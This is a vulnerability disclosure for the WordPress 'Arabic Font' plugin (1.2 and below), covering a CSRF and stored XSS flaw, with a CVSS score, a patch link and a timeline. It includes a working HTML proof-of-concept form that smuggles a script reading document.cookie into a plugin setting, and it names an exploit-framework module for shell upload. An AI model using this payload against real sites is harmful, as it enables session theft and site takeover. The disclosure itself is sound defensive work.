Homepage
https://wordpress.org/plugins/arabic-font/
Overview
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
CVSS Score
5.2
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:W/RC:C)
Versions Affected
1.2 and below
Solution
There is no official update to resolve this, but an unofficial patch has been included in this disclosure.
Unofficial Patch
The patched plugin can be found here: https://drive.google.com/file/d/1OWUiPZIQPKIc00hMocr6EukOPoHMWsHZ/view?usp=sharing
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">
<input type="hidden" name="save1" value="Save changes">
<input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
<input type="hidden" name="AF_fontsize" value="18">
<input type="hidden" name="AF_lineheight" value="45">
<input type="hidden" name="AF_textalign" value="Center">
<input type="hidden" name="AF_defaultcssclass" value=".arab"><script>alert(document.cookie)</script><input+type="hidden"+value="">
<input type="hidden" name="AF_customcss" value="">
<input type="hidden" name="action" value="save">
<input type="submit" value="Drink all the booze, hack all the things.">
</form>
WordPress Exploit Framework Module
exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload
WPVDB-ID
Disclosure Timeline
- 2017-07-18: Initial discovery
- 2017-07-18: Contacted vendor with proof of concept and details of the vulnerabilities
- 2017-07-20: Contacted WordPress to report vulnerability
- 2017-07-20: Plugin removed from WordPress repository
- 2017-07-20: Developed an unofficial patch in lieu of the vendor producing one
- 2017-07-20: Released public disclosure